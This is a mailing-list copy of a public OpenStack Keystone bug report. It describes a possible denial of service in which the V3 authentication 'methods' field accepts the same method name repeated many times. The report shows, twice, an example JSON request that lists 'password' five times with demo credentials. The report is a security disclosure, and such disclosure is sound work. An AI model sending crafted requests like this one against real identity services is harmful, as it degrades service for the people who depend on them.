yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #12484
[Bug 1300274] [NEW] V3 Authentication Chaining - uniqueness of auth method names
Public bug reported:
In V3.0 API, we can chain authentication methods. An attacker can place
the same authentication method multiple times in the methods filed. This
will result in the same authentication method checking over and over
(for loop in code). Using this, an attacker can achieve some sorts of
Denial of Service. The methods field is not properly sanitized.
{
"auth":{
"identity":{
"methods":[
"password",
"password",
"password",
"password",
"password"
],
"password":{
"user":{
"domain":{
"id":"default"
},
"name":"demo",
"password":"stack"
}
}
}
}
}
** Affects: keystone
Importance: Undecided
Status: New
** Tags: security
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1300274
Title:
V3 Authentication Chaining - uniqueness of auth method names
Status in OpenStack Identity (Keystone):
New
Bug description:
In V3.0 API, we can chain authentication methods. An attacker can
place the same authentication method multiple times in the methods
filed. This will result in the same authentication method checking
over and over (for loop in code). Using this, an attacker can achieve
some sorts of Denial of Service. The methods field is not properly
sanitized.
{
"auth":{
"identity":{
"methods":[
"password",
"password",
"password",
"password",
"password"
],
"password":{
"user":{
"domain":{
"id":"default"
},
"name":"demo",
"password":"stack"
}
}
}
}
}
To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1300274/+subscriptions
Follow ups
References
